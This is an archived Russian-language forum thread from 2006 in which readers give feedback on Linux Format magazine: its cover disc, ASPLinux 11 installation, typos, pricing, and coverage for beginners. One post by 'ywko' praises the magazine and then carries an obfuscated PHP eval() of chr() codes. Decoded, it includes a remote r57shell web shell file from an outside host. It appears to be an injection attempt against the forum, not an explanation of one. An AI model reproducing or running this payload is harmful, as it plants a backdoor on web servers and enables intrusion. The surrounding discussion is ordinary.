Linux Format: пожелания читателей

Обсуждение журнала LinuxFormat
(форум переехал, здесь только архив)
Alexxx
Статус: --==XXX==--
ОС: Archlinux current

Re: Linux Format: пожелания читателей

Сообщение Alexxx »

Limbo писал(а):
29.04.2006 14:37
Надо бы на обложках журнала прописывать месяц и год издания, как вы думаете? как никак периодика.

Есть на торце. :) Ну и на лицевой в принципе не помешает для полного счастья.
Спасибо сказали:
phasma

Сообщение phasma »

не кините QNX, хотелось бы потрогать это )))
NB: Dell XPS 1330 T5250|DDR2 4GB|NV 8400|250 GB
Old NB: Asus A6km AMD Turion MT-32|DDR 2 GB|NV GFGO 7300|60 Gb
Спасибо сказали:
alv
Бывший модератор
Статус: Пенсионер в законе
ОС: Cintu

Сообщение alv »

phasma писал(а):
29.04.2006 22:55
не кините QNX, хотелось бы потрогать это )))

боюсь, лицензия не позволит
но скачать можно
Спасибо сказали:
brob

Сообщение brob »

Являюсь "счастливым" обладателем ЛиФ за апрель-месяц. "Счастливым" потому, что записаный на нем ASPLinux11 состоит всего из 1 диска! Но это не так, потому как на диске есть пакеты из других дисков!!!

Вопрос: как мне убедить соответсвующий инсталер что на диске 4 болванки на 1 ДвД (перезапись на другой носитель невозможна и нежелательна)?

Пожелания... Господа составители диска! Будьте чуточку внимательней!
Мясо должно быть холодным, женщина горячей, а пива МНОГО!!!!

brabys@jabber.ru
Спасибо сказали:
phasma

Сообщение phasma »

alv
не, я про демонстрационную версию ))) понятное дело что лицензионной версии не видать, как своих ушей )))
Спасибо сказали:
alv
Бывший модератор

Сообщение alv »

phasma писал(а):
30.04.2006 10:08
alv
не, я про демонстрационную версию ))) понятное дело что лицензионной версии не видать, как своих ушей )))

так она же вроде демо-версии не имеет?
м.б. что-то у них изменилось, но раньше как было:
Вы можете скачать полнофункциональную рабочую версию и юзать ее легально и бесплатно в личных целях
а платить им надо при любом коммерческом использовании (в т.ч. и распространении)
и много платить :)
Спасибо сказали:
phasma

Сообщение phasma »

alv
ну дык попробовать в личных целях ))) мне больше не надо ))) потрогаю, пощупаю и все ...
Спасибо сказали:
MaGIc laNTern
Статус: 人です
ОС: Gentoo

Сообщение MaGIc laNTern »

brob:
Странно. Я как-раз сегодня поставил с этого диска ASPLinux v11, вместо того ASPLinux v10 Standard, что стоял у меня.
Всё поставилось замечательно. Хотя многие пакеты, которые Я выбрал - не установились.
Зато не просило поменять диск. Только ругнулось на то что не может CDROM отмонтировать, хотя с v10 Standard такого не было. И ещё до этого на что-то ругнулось про пакеты, чего с v10 опять-же не было.

random_code: Огромное тебе спасибо за v11! Очень в тему сегодня мне был!
Ибо v10 у меня как-то совсем по-страшному глючить начал.
Спасибо сказали:
brob

Сообщение brob »

To MaGIc laNTern

Хотя многие пакеты, которые Я выбрал - не установились

Интересно! А ты не пробовал после установки эти пакеты доустанавливать? У меня он тоже не все установил, а потом оказалось ....

brabys@jabber.ru
Спасибо сказали:
Limbo
ОС: Fedora 13 b.

Сообщение Limbo »

Блин, послушал вас, придется ASPlinux сперва под qemu ставить......
We trust in source
Спасибо сказали:
MaGIc laNTern
Статус: 人です
ОС: Gentoo

Сообщение MaGIc laNTern »

Limbo:
Да нет, в целом дистрибутив отличный!
Настроен v11 очень недурно. Железо всё заводит вообще без твоего участия.
В том числе такое как TV\FM тюнер AverTV Studio 307 или видеокарточку ATi Radeon 9600 XT.
Процесс установки тоже замечательный. Дают в виртуальном (наконец-то!) терминале посидеть, в игрушки поиграть пока дистрибутив ставится.
И что самое главное в ASPLinux (не только v11) - сразу в конце установки (а она весьма и весьма быстрая с normal-end железом) ты получаешь полноценную (!) операционную систему со всем нужным для десктопа софтом, да ещё и на русском языке!
З.Ы. ASP мне не платят, просто дистрибутив и вправду потрясающий.
Спасибо сказали:
brob

Сообщение brob »

ASPшка мне тоже очень понравилась! Жалею только об одном: купил её вместе с ЛиФ (!без обид для журнала!)!

Тогда можно вопрос бывалым "шапочникам": как установщику (или инсталлеру) доказать, что на ДвД все 5 дисков (где и что править)????

brabys@jabber.ru
Спасибо сказали:
ywko

Сообщение ywko »

Отличный журнал! Так держать.

eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //

Спасибо сказали:
brob

Сообщение brob »

Журнал отличный, составителю диска большое спасибо!!!!

brabys@jabber.ru
Спасибо сказали:
unflag
Бывший модератор
Статус: здесь могла бы быть ваша реклама
ОС: Debian testing/Win Server 2008

Сообщение unflag »

Журнал просто обалденный! Вчера купил два номера в 1С на Селезневской стрит(кстати, один номер стоит там 210 рублей - не дороговато ли?), и весь день читал. Очень порадовался статьям про Gimp и Incscape. Еще понравилось на сон грядущий почитать про установку драйверов видео - как раз по этому вопросу последнее время специализируюсь:))) Вообще, хватает отличных статей, и для чайников, и для продвинутых пользователей. Сейча читаю про конфигурирование ядра - и все понимаю, что удивительно:))) Так держать! Есть даже несколько пожеланий - порекомендовать всяким 1С сбросить цену да и вообще хочется, чтоб можно было купить номер в любой палатке с прессой. Да и вот еще что - очень много опечаток. Прямо неприличное количество. Серьезную информацию подаете ведь. В общем, дайте по рогам всяким литературным редакторам или кто у вас занимается проверкой текстов. Это я не со зла. Просто отрицательное впечатление складывается от прочтения таких вот текстов... По поводу диска - надеюсь, со временем появится у вас удобный хтмл-интерфейс. Я сам только недавно перелез на линукс серьезно(хотя интересуюсь довольно давно), а потому разбираться где, что и зачем лежит на диске мне несколько сложно. Хотя, и думаю, многие со мной соглясятся - линукс не значит неудобно. Вроде, странный подход получается - раз на линухе сидишь, значит можешь и с неудобством смириться? Хотя, может я просто и не увидел интерфейса - из под виндовз диск смотрел. Ну вот. Желаю дальнейшего развития и всяческого благополучия журналу.

PS. Вопрос про цену снимается - даже через интернет 200 вечнодеревянных просят... Странно, я где-то встречал упоминание про 150 рублей при заказе через инет...

One day! One day, who knows?
Someday! Someday I suppose!

Конференция в jabber: linuxforum@conference.jabber.ru
Спасибо сказали:
LightFalcon
Статус: Любитель Free...
ОС: Debian Squezee\Etch\Lenny

Сообщение LightFalcon »

MaGIc laNTern, видющку поднял, это понимать как: "встали иксы" или как "Работает OpenGL".
Просто очень актуальный вопрос, сейчас у меня Mandriva 2006, иксы работают а вот opengl никкаим средствами немогу заставить работать.
Спасибо сказали:
Val
Ведущий рубрики
Статус: Редактор LXF

Сообщение Val »

dd2k писал(а):
03.05.2006 15:30
Журнал просто обалденный!

Спасибо!

Да и вот еще что - очень много опечаток. Прямо неприличное количество. Серьезную информацию подаете ведь. В общем, дайте по рогам всяким литературным редакторам или кто у вас занимается проверкой текстов. Это я не со зла. Просто отрицательное впечатление складывается от прочтения таких вот текстов...

Тема опечаток тут (к сожалению) поднималась неоднократно. Хотелось бы знать, о каком номере идет речь? Вроде бы мы пришли к общему консенсусу, что начиная с февраля-марта с этим стало нормально.

По поводу диска - надеюсь, со временем появится у вас удобный хтмл-интерфейс.

Так он вроде бы там есть... Насколько удобный - не знаю (все субъективно), но в HTML - точно: товарищ random_code регулярно его переводит.

PS. Вопрос про цену снимается - даже через интернет 200 вечнодеревянных просят... Странно, я где-то встречал упоминание про 150 рублей при заказе через инет...

150 рублей за номер - цена при подписке через Интернет. В розницу, конечно, дороже.
"Если думаешь, говоришь, пишешь и подписываешь - не удивляйся." (с)
Спасибо сказали:
Limbo

Сообщение Limbo »

MaGIc laNTern писал(а):
01.05.2006 11:51
Limbo:
Да нет, в целом дистрибутив отличный!
Настроен v11 очень недурно. Железо всё заводит вообще без твоего участия.
В том числе такое как TV\FM тюнер AverTV Studio 307 или видеокарточку ATi Radeon 9600 XT.
Процесс установки тоже замечательный. Дают в виртуальном (наконец-то!) терминале посидеть, в игрушки поиграть пока дистрибутив ставится.
И что самое главное в ASPLinux (не только v11) - сразу в конце установки (а она весьма и весьма быстрая с normal-end железом) ты получаешь полноценную (!) операционную систему со всем нужным для десктопа софтом, да ещё и на русском языке!
З.Ы. ASP мне не платят, просто дистрибутив и вправду потрясающий.

Да я знаю что дист хороший, сам щас на десятке сижу просто вижу люди жалуются что пакеты не все ставятся то да сё

З.Ы. Мне тоже неплатят...
We trust in source
Спасибо сказали:
Infinity

Сообщение Infinity »

А у меня почему ASP 11 не ставится? Сторона вообще не загрузочная. Пробовал записать на болванки исошки - одну на 6,5 Мб, другую на 500 с чем то метров - пофигу. Не грузится этот АСП. Как сделать чтобы установить или у меня диск бракованный попался?
SUSE то с другой стороны нормальный, и грузится и инсталится.
Спасибо сказали:
unflag
Бывший модератор
Статус: здесь могла бы быть ваша реклама
ОС: Debian testing/Win Server 2008

Сообщение unflag »

Val писал(а):
03.05.2006 16:48

Да и вот еще что - очень много опечаток. Прямо неприличное количество. Серьезную информацию подаете ведь. В общем, дайте по рогам всяким литературным редакторам или кто у вас занимается проверкой текстов. Это я не со зла. Просто отрицательное впечатление складывается от прочтения таких вот текстов...

Тема опечаток тут (к сожалению) поднималась неоднократно. Хотелось бы знать, о каком номере идет речь? Вроде бы мы пришли к общему консенсусу, что начиная с февраля-марта с этим стало нормально.

Я купил номера за февраль и апрель. В февральском, кстати, меньше печаток, но все-равно хватает. Очень бросается в глаза. Не хочется бездоказательно это утверждать, но номеров сейчас нет под рукой. Да и(грешен, грешен!) лениво опечатки там разыскивать. В любом случае, читал тут здравые слова - это в прошлом, старайтесь и все наладится. Хоть и говорили тут про обрезанные статьи, но не могу смолчать - обидно, когда на самом интересном месте в статье про "Майкрософт открывается" текст вдруг исчезает и продолжения никто не обещает. Было бы здорово, если бы вы начали около каждой новости писать интернет-источник, если он существует. Стало бы гораздо проще - можно всегда дочитать статью в случае такого поворота дел и никто не в обиде(ну, я то уж точно бы не расстраивался так сильно - издание молодое, можно пока косяки прощать=)).
А то, что хтмл все-таки есть - хорошо. Странно, что я его из под винды не нашел, но, видать, плохо искал.
Спасибо.

One day! One day, who knows?
Someday! Someday I suppose!

Конференция в jabber: linuxforum@conference.jabber.ru
Спасибо сказали:
Limbo

Сообщение Limbo »

Люди кто АСПлинух 11 ставил подскажите, в начале инстала там выбор системы типа "Рабочая станция" "Разработка" и пр как в АСПлинух 10 да?

ОпенBSD39 в розливе какнибудь скиньте на DVD http://www.openbsd.org/39.html
совсем необязательно ждать пока его сделают *.iso кидаете тот что есть
We trust in source
Спасибо сказали:
phasma

Сообщение phasma »

Limbo
OpenBSD была в предидущем номере ...

З.Ы. ну как насчет QNX ? %)
Спасибо сказали:
blaster

Сообщение blaster »

Просьба к авторам журнала: не забывайте, чтоли, что на линукс переходит много новичков, по этому пишите некоторые статьи попроще, или сделайте соответствующую страничку, чтоли.. Берите пример с Мир ПК, чтоли..
Спасибо сказали:
Zer0
ОС: Void, Slackware

Сообщение Zer0 »

Про Solaris бы статейку, вроде тоже бесплатный *nix, хотя и несвободный.
Memento mori ... сделай бэкап.
Спасибо сказали:
phasma

Сообщение phasma »

blaster
а "Системный администратор" ориентуриуется на новичков ?) это всего еще один повод прогуляться по гуглу ))) не больше ... судя по себе, ну просто отлично помогли всякие вопросы с поисковиками ... а если ориентироваться на новичков, то думаю журнал превратиться во что-то типа "ЛКФ узнай как поставить альтернативную ОС, даже без Фотошопа" ...
Спасибо сказали:
blaster

Сообщение blaster »

phasma
Я говорю, что про новичков не стоит забывать. Не надо утрировать.
Спасибо сказали:
Evgueni
ОС: Ubuntu ☹

Сообщение Evgueni »

blaster писал(а):
08.05.2006 00:20
phasma
Я говорю, что про новичков не стоит забывать. Не надо утрировать.
Новичок это весьма зыбкое, я бы сказал пограничное, состояние между человеком из параллельной вселенной и обитателем обсуждаемого континуума. Никто в этом состоянии долго не задерживается, так что смысла ориентироваться именно на новичков особого нет. IMHO, естественно.
Спасибо сказали:
alv
Бывший модератор

Сообщение alv »

Evgueni писал(а):
08.05.2006 06:46
Новичок это весьма зыбкое, я бы сказал пограничное, состояние между человеком из параллельной вселенной и обитателем обсуждаемого континуума.

хорошая формулировка. у меня все время на языке вертелось нечто подобное - но никак не кристаллизовалось
Evgueni писал(а):
Никто в этом состоянии долго не задерживается

по крайней мере, не должен бы :)
Evgueni писал(а):
так что смысла ориентироваться именно на новичков особого нет

тем более что мало кто из новичков будет учиться по журнальным статьям - на сей предмет специальные книги есть
а вообще-то, в LXF примерно треть материалов рассчитана на начинающих
Спасибо сказали:
blaster

Сообщение blaster »

alv
Evgueni
Вы хоть раз читали PCWorld? Скажите, что там трудно написано? Или про то, что там аудитория новички одни? Нет. Написано понятно, просто о сложном. Вот с кого надо брать пример. Я думаю врятли кому-нибудь из заядлых линуксоидов бкдет хуже, ЕСЛИ этот журнал будет писать всё лучше и лучше.

Не забывайте, что вас читают все (сами пишите, что журнал для ВСЕХ пользователей Linux). И если хотите, чтобы на Linux перешло как можно больше народу, лучше не противиться изменениям.

Поэтому давайте не будем спорить. Очень хорошо, что в этом журнале уже есть статьи для новичков. Это уже чувствуется.
Спасибо сказали:
romanio

Сообщение romanio »

phasma писал(а):
07.05.2006 15:06
Limbo
OpenBSD была в предидущем номере ...

З.Ы. ну как насчет QNX ? %)

Действительно, как насчет него? Тоже хочу попробовать. ;) А насчет лицензии: по-моеиу она это позволяет...
Заходите на форум!
Несмотря на то, что он специализированный, приветствуются и просто хорошие люди :)
Спасибо сказали: